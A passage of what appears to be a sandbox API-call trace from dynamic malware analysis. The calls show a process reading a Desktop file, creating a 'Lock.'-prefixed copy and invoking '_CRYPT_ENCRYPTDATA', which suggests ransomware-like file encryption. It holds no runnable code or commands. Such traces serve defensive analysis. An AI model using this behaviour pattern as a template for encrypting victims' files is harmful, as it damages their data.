hHeap=0x970000) returned 1 [0215.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0215.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0215.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0215.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0215.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0215.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0215.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0215.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0215.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0215.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0215.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0215.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0215.307] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0215.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0215.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0215.308] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0215.308] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0215.308] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0215.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0215.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0215.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0215.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0215.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0215.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0215.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0215.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0215.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0215.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0215.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0215.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0215.310] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Z3NyFrC6_WxtuHo-dMOg.ots" (normalized: "c:\\users\\fd1hvy\\desktop\\z3nyfrc6_wxtuho-dmog.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0215.310] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.310] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0215.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0215.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0215.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0215.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0215.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0215.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0215.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0215.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0215.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0215.311] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0215.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0215.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0215.311] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0215.311] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0215.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0215.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0215.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0215.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0215.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0215.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0215.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0215.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0215.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0215.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0215.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0215.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0215.312] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0215.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0215.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0215.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0215.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f14010 [0215.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0215.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0215.312] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.Z3NyFrC6_WxtuHo-dMOg.ots" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.z3nyfrc6_wxtuho-dmog.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0215.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0215.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0215.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0215.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0215.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0215.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0215.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0215.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0215.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0215.313] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0215.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0215.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0215.313] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0215.314] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0215.314] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0215.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0215.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0215.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0215.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0215.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0215.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0215.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0215.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0215.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0215.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0215.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0215.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0215.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0215.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0215.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5f020 [0215.318] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0215.318] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0xcdd9, lpOverlapped=0x0) returned 1 [0215.378] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0215.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0215.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0215.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0215.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0215.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xcdd9) returned 0x2f24018 [0215.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5f020 | out: hHeap=0x970000) returned 1 [0215.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0215.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0215.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0215.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0215.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0215.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0215.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0215.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0215.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xcdd9) returned 0x2f30e00 [0215.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0215.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0215.384] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0215.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0215.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0215.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0215.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0215.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xcdd9) returned 0x2f24018 [0215.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0215.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0215.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0215.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0215.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0215.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0215.385] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0215.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0215.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0215.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0215.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0215.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0215.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0215.386] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0215.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0215.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0215.386] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0215.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0215.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0215.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0215.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0215.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0215.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0215.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0215.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0215.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xcdd9) returned 0x2f24018 [0215.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0215.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b78 [0215.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0215.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0215.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0215.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d08 [0215.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0215.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0215.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0215.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0215.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0215.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0215.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0215.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0215.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0215.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0215.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0215.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0215.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0215.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xcdd9) returned 0x2f3dbe8 [0215.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0215.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0215.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0215.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0215.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0215.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0215.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0215.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0215.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0215.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0215.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0215.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0215.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0215.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0215.390] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.390] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.390] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.390] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.390] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.390] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.391] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0215.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0215.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0215.391] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.391] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0215.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0215.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0215.391] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.391] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0215.391] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.391] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0215.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0215.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0215.391] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.391] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0215.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0215.391] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, 